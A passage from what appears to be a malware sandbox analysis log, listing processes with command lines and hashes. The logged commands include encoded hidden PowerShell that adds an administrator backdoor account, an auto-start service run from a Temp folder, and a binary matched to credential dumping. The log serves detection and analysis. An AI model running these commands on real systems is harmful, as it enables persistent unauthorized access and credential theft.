                                                                                                            Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:25
                                                                                                            Start time:03:09:40
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:03:10:23
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:27
                                                                                                            Start time:03:10:23
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:28
                                                                                                            Start time:03:10:23
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:sc query myRdpService
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:29
                                                                                                            Start time:03:10:24
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:30
                                                                                                            Start time:03:10:24
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:31
                                                                                                            Start time:03:10:24
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:sc stop "myRdpService"
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:32
                                                                                                            Start time:03:10:25
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:33
                                                                                                            Start time:03:10:25
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:34
                                                                                                            Start time:03:10:25
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:sc query myRdpService
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:35
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:36
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:37
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:sc delete "myRdpService"
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:38
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:39
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:net start "myRdpService"
                                                                                                            Imagebase:0x7ff73fbe0000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:40
                                                                                                            Start time:03:10:32
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                                            Imagebase:0x7ff634dd0000
                                                                                                            File size:183'808 bytes
                                                                                                            MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:41
                                                                                                            Start time:03:10:33
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\Temp\myRdpService.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Temp\myRdpService.exe cakoi7
                                                                                                            Imagebase:0x7ff63b7a0000
                                                                                                            File size:9'429'504 bytes
                                                                                                            MD5 hash:10C767E2635167724D6A03475ED8F7A9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp, Author: @mimeframe
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 5%, ReversingLabs
                                                                                                            Has exited:false

                                                                                                            Target ID:42
                                                                                                            Start time:03:10:40
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\regedit.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
                                                                                                            Imagebase:0x7ff62c7d0000
                                                                                                            File size:370'176 bytes
                                                                                                            MD5 hash:999A30979F6195BF562068639FFC4426
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:43
                                                                                                            Start time:03:10:40
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";"
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:44
                                                                                                            Start time:03:10:40
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:45
                                                                                                            Start time:03:10:41
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\system32\systeminfo.exe"
                                                                                                            Imagebase:0x7ff63c2a0000
                                                                                                            File size:110'080 bytes
                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:46
                                                                                                            Start time:03:10:42
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff738b60000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:47
                                                                                                            Start time:03:10:45
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:48
                                                                                                            Start time:03:10:45
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:49
                                                                                                            Start time:03:10:45
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:/c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:50
                                                                                                            Start time:03:10:45
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:51
                                                                                                            Start time:03:10:46
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Reset < >
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: de1985d35c4d19cf649af9929a4e4876baf0760159bd8abbbd4a221330468548
                                                                                                              • Instruction ID: 023f7bee89b6c8554b3d406a06fae932a1875ce038b6d156782b8d4e8c1b7be3
                                                                                                              • Opcode Fuzzy Hash: de1985d35c4d19cf649af9929a4e4876baf0760159bd8abbbd4a221330468548
                                                                                                              • Instruction Fuzzy Hash: 7DF1823190CA8D8FEBA9EF28C8557E937E2FF54310F04466AE84DC7291DB35A845CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf1e45b60c640f455a23e265117469f16f14caa6fe5d2e9000681b718d6c69dd
                                                                                                              • Instruction ID: a7a391bbfb04a76dd238063eab3a884adaafcbb18d9f24dd16204b33a0872252
                                                                                                              • Opcode Fuzzy Hash: bf1e45b60c640f455a23e265117469f16f14caa6fe5d2e9000681b718d6c69dd
                                                                                                              • Instruction Fuzzy Hash: C4E1C230A0CA4E8FEBA9EF28C8557E977D2FF54310F04466AD84DC7291DA75A884CB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 331601cea5ea8e5a20cc25e8d6275e96ac98ddeb05c937186d36d2fee8f5fd1d
                                                                                                              • Instruction ID: 190b24b9a42eb02b7c28b136b79c8a372c93fa6726b643661e93c421b95bc373
                                                                                                              • Opcode Fuzzy Hash: 331601cea5ea8e5a20cc25e8d6275e96ac98ddeb05c937186d36d2fee8f5fd1d
                                                                                                              • Instruction Fuzzy Hash: BA31E47190CB8C8FEB1ADB5898597E97FF0EF52311F0841AFC089C7193D6256849CB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3195232286.00007FFC45C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45C60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc45c60000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f740c5afe3c290769868fd39652042c1d9c1303279b55ff58bed56d07d836514
                                                                                                              • Instruction ID: 24cd8cd0fef8cc67479d0f3f5cc9efa1b37616367245fcf2680547e8bb319ef0
                                                                                                              • Opcode Fuzzy Hash: f740c5afe3c290769868fd39652042c1d9c1303279b55ff58bed56d07d836514
                                                                                                              • Instruction Fuzzy Hash: 3BB1396290DAEE4FEB56E72848652B57BD1EF5A610F0808FEC04DEB1D3DD18AD05C362
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5e0a8fea13d82797200e5333dc9bc268893b27858f7699edd7ed617d435d565b
                                                                                                              • Instruction ID: 974ce80242345c40668738318b471f480e4db1e570ca8e8a97f71a5db699225b
                                                                                                              • Opcode Fuzzy Hash: 5e0a8fea13d82797200e5333dc9bc268893b27858f7699edd7ed617d435d565b
                                                                                                              • Instruction Fuzzy Hash: 8AB1E53050CA4D8FEBA9EF28C8557E93BE1FF55310F14466EE84DC7292CA35A845CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8f3b62f707637ce9e46ad5e1dbb88997d8554c08beeb89d71617fd3381ea7676
                                                                                                              • Instruction ID: d20a54469b6639865ec6887c6961f5a568bd6aa460b85b1d6e2478bf450e89aa
                                                                                                              • Opcode Fuzzy Hash: 8f3b62f707637ce9e46ad5e1dbb88997d8554c08beeb89d71617fd3381ea7676
                                                                                                              • Instruction Fuzzy Hash: 12411631A0CB4C8FEB59DF9CD84A7E97BE0EB55331F04822BC449C7152D675A416CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92d3b19b76299cb0ea2ce13b6a97108ff0e542cb523fa4ee109d7e44382fe60f
                                                                                                              • Instruction ID: 5fdc67f81f2c7015399002f5233417406324dbfbc10bf99eeb7b945a6063870f
                                                                                                              • Opcode Fuzzy Hash: 92d3b19b76299cb0ea2ce13b6a97108ff0e542cb523fa4ee109d7e44382fe60f
                                                                                                              • Instruction Fuzzy Hash: 3D410330A0C91E8FEF94EF18C455ABA77E2FF95B14F540479D04AC32A2DA35E882C790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 69a0e544389eecfef7ee170a54ddd652af7c9942fad7124b69a5cd07599afb66
                                                                                                              • Instruction ID: b028236f6017ed9bd920acc31e6197305f0bc35c987eb9a27f15f0d9cfb5d0e2
                                                                                                              • Opcode Fuzzy Hash: 69a0e544389eecfef7ee170a54ddd652af7c9942fad7124b69a5cd07599afb66
                                                                                                              • Instruction Fuzzy Hash: A541163190C74C8FEB59DF9C984A7E97BE0EB96331F04826BC049C7152D775A416CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a4638ea9bf3d62ada00225e118e8646cb38b1da8b0845ee014c89403fc558df
                                                                                                              • Instruction ID: 490f012b392eecb13622dc906e710301a76ab309449d6f14d00748dc3fcb22f8
                                                                                                              • Opcode Fuzzy Hash: 7a4638ea9bf3d62ada00225e118e8646cb38b1da8b0845ee014c89403fc558df
                                                                                                              • Instruction Fuzzy Hash: 4031043191CB4C8FDB19DB5C98466E9BBE0FB99721F00422FE449C3292CB71A855CBD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ac7e5c878aa4fc1a028c423066eb7d6a00345753d01651169f9257efa4a2bf6
                                                                                                              • Instruction ID: c104ec2ccba628edcb5fb0560645bfebf6839741689012eb4ff3eb937251ab19
                                                                                                              • Opcode Fuzzy Hash: 8ac7e5c878aa4fc1a028c423066eb7d6a00345753d01651169f9257efa4a2bf6
                                                                                                              • Instruction Fuzzy Hash: CE316725B0CA1E0FE745F73CA8241FC77E2EF89E20B4405B6D04AC7197DE14A802C3A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3178990009.00007FFC455C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc455c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b76fa02aa093108bb1752385b204566156c4bbd2b57ca7f7b070b46d4847b50f
